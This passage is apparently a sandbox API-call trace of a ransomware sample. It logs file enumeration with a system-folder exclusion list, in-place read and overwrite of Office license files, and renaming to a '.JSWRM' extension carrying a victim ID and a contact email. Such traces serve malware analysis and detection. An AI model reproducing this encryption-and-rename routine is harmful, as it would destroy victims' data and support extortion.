Flags=0x0, Size=0x30) returned 0x22d260 [0105.501] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_Subscription5-ul-oob.xrm-ms", cchWideChar=40, lpMultiByteStr=0x22d260, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365ProPlusR_Subscription5-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 40 [0105.501] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232d50 | out: hHeap=0x1e0000) returned 1 [0105.501] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232d50 [0105.501] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_Subscription5-ul-oob.xrm-ms", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0105.501] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0105.501] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_Subscription5-ul-oob.xrm-ms", cchWideChar=40, lpMultiByteStr=0x22d298, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365ProPlusR_Subscription5-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 40 [0105.501] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232d50 | out: hHeap=0x1e0000) returned 1 [0105.501] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bda8 [0105.501] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235d38 | out: hHeap=0x1e0000) returned 1 [0105.501] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0105.501] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0105.501] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b9c0 [0105.501] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_Subscription5-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subscription5-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0105.502] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11646) returned 1 [0105.502] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.502] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d70) returned 0x24c1d0 [0105.502] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d70, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d70, lpOverlapped=0x0) returned 1 [0105.505] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.505] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d70, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d70, lpOverlapped=0x0) returned 1 [0105.505] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0105.505] CloseHandle (hObject=0x45c) returned 1 [0105.505] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b1f0 [0105.505] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0105.505] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0105.505] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0105.505] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0105.506] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0105.506] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0105.506] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0105.506] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0105.506] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0105.506] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b768 [0105.506] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f4d0 [0105.506] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b768 | out: hHeap=0x1e0000) returned 1 [0105.506] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0105.506] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_Subscription5-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subscription5-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_Subscription5-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subscription5-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0105.507] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f4d0 | out: hHeap=0x1e0000) returned 1 [0105.507] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1f0 | out: hHeap=0x1e0000) returned 1 [0105.507] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b9c0 | out: hHeap=0x1e0000) returned 1 [0105.507] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0105.507] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0105.507] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe68d7584, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe68d7584, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe6a54cdd, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2bab, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365ProPlusR_SubTrial1-pl.xrm-ms", cAlternateFileName="O342A1~1.XRM")) returned 1 [0105.507] lstrcmpiW (lpString1="O365ProPlusR_SubTrial1-pl.xrm-ms", lpString2=".") returned 1 [0105.507] lstrcmpiW (lpString1="O365ProPlusR_SubTrial1-pl.xrm-ms", lpString2="..") returned 1 [0105.507] lstrcmpiW (lpString1="O365ProPlusR_SubTrial1-pl.xrm-ms", lpString2="...") returned 1 [0105.507] lstrcmpiW (lpString1="O365ProPlusR_SubTrial1-pl.xrm-ms", lpString2="windows") returned -1 [0105.507] lstrcmpiW (lpString1="O365ProPlusR_SubTrial1-pl.xrm-ms", lpString2="recovery") returned -1 [0105.507] lstrcmpiW (lpString1="O365ProPlusR_SubTrial1-pl.xrm-ms", lpString2="perflogs") returned -1 [0105.507] lstrcmpiW (lpString1="O365ProPlusR_SubTrial1-pl.xrm-ms", lpString2="documents and settings") returned 1 [0105.507] lstrcmpiW (lpString1="O365ProPlusR_SubTrial1-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0105.507] lstrcmpiW (lpString1="O365ProPlusR_SubTrial1-pl.xrm-ms", lpString2="system volume information") returned -1 [0105.507] lstrcmpiW (lpString1="O365ProPlusR_SubTrial1-pl.xrm-ms", lpString2="msocache") returned 1 [0105.507] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c170 [0105.507] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_SubTrial1-pl.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0105.507] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0105.507] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_SubTrial1-pl.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22d0a0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365ProPlusR_SubTrial1-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0105.507] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c170 | out: hHeap=0x1e0000) returned 1 [0105.507] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0105.507] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_SubTrial1-pl.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0105.507] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0105.507] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_SubTrial1-pl.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22cdc8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365ProPlusR_SubTrial1-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0105.507] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0105.507] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0105.507] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bda8 | out: hHeap=0x1e0000) returned 1 [0105.507] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0105.507] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0105.507] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0105.507] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_SubTrial1-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subtrial1-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0105.508] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11179) returned 1 [0105.508] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.508] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2ba0) returned 0x24c1d0 [0105.508] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2ba0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2ba0, lpOverlapped=0x0) returned 1 [0105.520] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.520] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2ba0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2ba0, lpOverlapped=0x0) returned 1 [0105.523] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0105.523] CloseHandle (hObject=0x45c) returned 1 [0105.523] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0105.524] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0105.524] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0105.524] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0105.524] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0105.524] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0105.524] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0105.524] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0105.524] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0105.524] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0105.524] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2363b0 [0105.524] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dff8 [0105.524] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2363b0 | out: hHeap=0x1e0000) returned 1 [0105.524] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0105.524] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_SubTrial1-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subtrial1-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_SubTrial1-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subtrial1-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0105.525] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dff8 | out: hHeap=0x1e0000) returned 1 [0105.525] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0105.525] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0105.525] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0105.525] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0105.525] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe669b26a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe669b26a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe6923a47, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5f31, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365ProPlusR_SubTrial1-ppd.xrm-ms", cAlternateFileName="O37028~1.XRM")) returned 1 [0105.525] lstrcmpiW (lpString1="O365ProPlusR_SubTrial1-ppd.xrm-ms", lpString2=".") returned 1 [0105.525] lstrcmpiW (lpString1="O365ProPlusR_SubTrial1-ppd.xrm-ms", lpString2="..") returned 1 [0105.525] lstrcmpiW (lpString1="O365ProPlusR_SubTrial1-ppd.xrm-ms", lpString2="...") returned 1 [0105.525] lstrcmpiW (lpString1="O365ProPlusR_SubTrial1-ppd.xrm-ms", lpString2="windows") returned -1 [0105.525] lstrcmpiW (lpString1="O365ProPlusR_SubTrial1-ppd.xrm-ms", lpString2="recovery") returned -1 [0105.525] lstrcmpiW (lpString1="O365ProPlusR_SubTrial1-ppd.xrm-ms", lpString2="perflogs") returned -1 [0105.525] lstrcmpiW (lpString1="O365ProPlusR_SubTrial1-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0105.525] lstrcmpiW (lpString1="O365ProPlusR_SubTrial1-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0105.525] lstrcmpiW (lpString1="O365ProPlusR_SubTrial1-ppd.xrm-ms", lpString2="system volume information") returned -1 [0105.525] lstrcmpiW (lpString1="O365ProPlusR_SubTrial1-ppd.xrm-ms", lpString2="msocache") returned 1 [0105.525] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bd50 [0105.525] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_SubTrial1-ppd.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0105.525] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0105.525] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_SubTrial1-ppd.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22ce70, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365ProPlusR_SubTrial1-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0105.525] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bd50 | out: hHeap=0x1e0000) returned 1 [0105.525] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c698 [0105.525] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_SubTrial1-ppd.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0105.525] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0105.525] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365ProPlusR_SubTrial1-ppd.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22cdc8, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365ProPlusR_SubTrial1-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0105.525] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c698 | out: hHeap=0x1e0000) returned 1 [0105.526] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0105.526] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0105.526] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0105.526] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0105.526] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0105.526] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_SubTrial1-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subtrial1-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0105.526] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=24369) returned 1 [0105.526] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.526] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5f30) returned 0x24c1d0 [0105.526] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5f30, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5f30, lpOverlapped=0x0) returned 1 [0105.571] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.571] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5f30, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5f30, lpOverlapped=0x0) returned 1 [0105.572] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0105.572] CloseHandle (hObject=0x45c) returned 1 [0105.572] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0105.572] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0105.572] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0105.572] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0105.572] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0105.572] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0105.572] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0105.572] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0105.572] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0105.572] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0105.572] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24c0c8 [0105.572] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f3a8 [0105.572] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c0c8 | out: hHeap=0x1e0000) returned 1 [0105.572] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0105.572] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_SubTrial1-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subtrial1-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_SubTrial1-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subtrial1-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0105.573] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f3a8 | out: hHeap=0x1e0000) returned 1 [0105.573] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0105.573] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0105.573] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0105.573] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0105.573] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe6628a99, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe6628a99, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe699614a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d6e, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365ProPlusR_SubTrial1-ul-oob.xrm-ms", cAlternateFileName="O3E0EE~1.XRM")) returned 1 [0105.573] lstrcmpiW (lpString1="O365ProPlusR_SubTrial1-ul-oob.xrm-ms", lpString2=".") returned 1 [0105.574] lstrcmpiW (lpString1="O365ProPlusR_SubTrial1-ul-oob.xrm-ms", lpString2="..") returned 1 [0105.574] lstrcmpiW (lpString1="O365ProPlusR_SubTrial1-ul-oob.xrm-ms", lpString2="...") returned 1 